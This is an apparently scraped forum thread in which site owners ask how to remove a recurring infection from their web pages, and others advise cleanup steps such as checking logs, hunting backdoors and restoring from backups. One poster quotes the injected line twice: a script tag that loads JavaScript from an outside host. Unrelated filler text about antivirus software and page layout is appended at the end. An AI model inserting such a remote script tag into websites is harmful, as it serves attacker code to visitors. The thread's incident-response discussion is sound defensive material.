<div>
sealionstaff,<br />
<br />
Do you have a Content Management System or other scripts on your website? It sounds like someone is exploiting a hole in some script, accessing your site, and placing the code into your pages.<br />
<br />
If you have access to the log files, you might be able to determine where the hackers are coming from, and ask your hosting company to block their IP address out. You also will need to determine which script has the vulnerability and remove or repair it. Also, once the hole has been found, these hackers frequently place their own access tools on the server, so you'll need to look around and see if they've left a backdoor behind.<br />
<br />
Cheers,<br />
LHerrou
</div>


<div>
Hi LHerrou<br />
Thank you very much. I know I sound dumb, but can you give me a more detail instruction of how to look for such a &quot;backdoor&quot; if it exist? I don't have CMS on this website, but I have OSC Commerce. But this virus also appear on sites that don't use OSC Commerce... <br />
Thanks,<br />
Ann
</div>


<div>
Yes, I have to agree with Admin3k - everything has to be cleaned out. Sometimes the hackers even install within the datebase for the cart, so when the cart runs, they re-infect all over again. It's also possible (if this is shared hosting) that another account was compromised, and your infection is incidental to that. Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans.<br />
<br />

</div>


<div>
Here's a couple more in-depth descriptions of how to handle this:<br />
Specific OS Commerce info:<br />
<a href="http://www.oscmax.com/forums/oscmax-v2-customization-mods/16496-website-recently-hacked.html" rel="ugc">http://www.oscmax.com/forums/oscmax-v2-customization-mods/16496-website-recently-hacked.html</a><br />
More general info:<br />
<a href="http://25yearsofprogramming.com/blog/20070705.htm" rel="ugc">http://25yearsofprogramming.com/blog/20070705.htm</a><br />

</div>


<div>
Hi everyone,<br />
Thanks for helping out. <br />
Lherrou, I have a question regarding what you said about &quot;Your hosting company should be cooperating on this - it's not a virus per se, so they won't find anything with antivirus scans.&quot; <br />
I agree that we need their help, because it's the same virus on a few different websites we host at the same hosting. Not all of them has OS commerce, so I kinda guess that it's not the root of the problem (I might be wrong anyway) . If they can't find anything with anti virus scans, then what should I ask them to do? 
</div>


<div>
I'd like to ask a few follow up questions - this issue is exactly what I have right now.<br />
<br />
The attack seems to inflect any file named 'index' or 'auth' - so index.php index.htm etc.<br />
<br />
My un-educated short term fix is to:<br />
hand-edit out the injected extra script (is always at the bottom) and then change the file permissions from 644 (rw for owner) to 444 (read only - all users).<br />
<br />
Since I know little about these things, I assumed that since blocking write access by 'owner' meant that it was one of the 4 PC I use to admin my site was the source of the infection.<br />
<br />
It that right/wrong/maybe/possible<wbr />/impossibl<wbr />e ??<br />
<br />
BTW: I basically only find out about the inflection when the virus scanner on my PC scans the daily backups of my site. &nbsp;I use AVG free and it seems to alert with 2 or 3 specific found virus names on those infected files. &nbsp;The AVG knowledge base though comes up blank about these viruses (today's was called 'JS/Downloader.Agent' which I guess is just a generic name - some days it mentions a more specific virus name). &nbsp;What is this virus doing?<br />
<br />
If this is a host based thing - or injected from outside. &nbsp;Please could you give more guidance to a beginner about finding the source.<br />
<br />
Thanks<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

</div>


<div>
XXhris,<br />
<br />
I encourage you to open your own question on this topic. Having said that, my guess is that this is (or was) injected from the outside. Someone found a vulnerability on your site (or potentially another site that shares the same server), and used that to break in. Once they are in, they are treated as having owner access, so they can continue to re-infect files as they please, or their script / virus automatically does so when it detects that you have deleted it. <br />
<br />
First step: Copy all files from your webserver to a local hard drive using FTP.<br />
Second step: Notify your web host, and follow any directions that they may have. This should include changing your FTP password.<br />
Third step: If they give you the OK (they may wish to preserve things for forensic analysis), delete all files on your webserver. <br />
Fourth step: Make sure all files you downloaded are clean (better yet, use an older backup of the site or your originals) and upload again - make sure that any web applications or databases are also secure.<br />
<br />
If you feel uncomfortable with any of this, you should utilize the services of a web security consultant, especially if you keep any kind of secure information on your website.<br />
<br />
Cheers,<br />
LHerrou
</div>


<div>
<div class="content wysiwyg-content">
Hi,<br />
I am currently facing this problem that I can't find any help from the hosting company and it's driving me crazy.<br />
All of a sudden most of my websites on different servers get the same virus that would add this line of code before the &lt;/body&gt; tag of all index, home and login pages regardless of php or html, etc.<br />
this is what it looks like:<br />
<br />
&lt;!-- o65 --&gt;&lt;script type='text/javascript' src='<a href="http://livestats.co.cc/script.js'" rel="ugc">http://livestats.co.cc/script.js'</a>&gt;&lt;/script&gt;&lt;!-- c65 --&gt;<br />
<br />
I tried delete them, but one or two weeks later, they appear again. And I asked the hosting to scan their server, they also found nothing.<br />
<br />
Does anybody have experience with this or suggest any solution?<br />
Please help me out. Thank you very much.
</div>
</div>


Hi,
I am currently facing this problem that I can't find any help from the hosting company and it's driving me crazy.
All of a sudden most of my websites on different servers get the same virus that would add this line of code before the </body> tag of all index, home and login pages regardless of php or html, etc.
this is what it looks like:

<script type='text/javascript' src='http://livestats.co.cc/script.js'></script>

I tried delete them, but one or two weeks later, they appear again. And I asked the hosting to scan their server, they also found nothing.

Does anybody have experience with this or suggest any solution?
Please help me out. Thank you very much.

Virus script found in all index and home page

Anti-virus software was originally developed to detect and remove computer viruses. However, with the proliferation of other kinds of malware, antivirus software started to provide protection from other computer threats. In particular, modern antivirus software can protect from malicious browser helper objects (BHOs), browser hijackers, ransomware, keyloggers, backdoors, rootkits, trojan horses, worms, malicious layered service providers (LSPs), dialers, fraud tools, adware and spyware. Some products also include protection from other computer threats, such as infected and malicious URLs, spam, scam and phishing attacks, online identity theft (privacy), online banking attacks, social engineering techniques, Advanced Persistent Threat (APT), botnets and DDoS attacks.

Anti-Virus Apps

Page layout, also known as desktop publishing, is the part of graphic design that deals in the arrangement of visual elements on a page. It generally involves organizational principles of composition to achieve specific communication objectives. With print media, elements usually consist of type (text), images (pictures), and occasionally place-holder graphics for elements that are not printed with ink such as die/laser cutting, foil stamping or blind embossing. Commonly used programs include Adobe PageMaker and InDesign, Corel Ventura, QuarkXPress, Microsoft Publisher and Xara, along with more specialized programs such as TeX, LaTeX and LyX.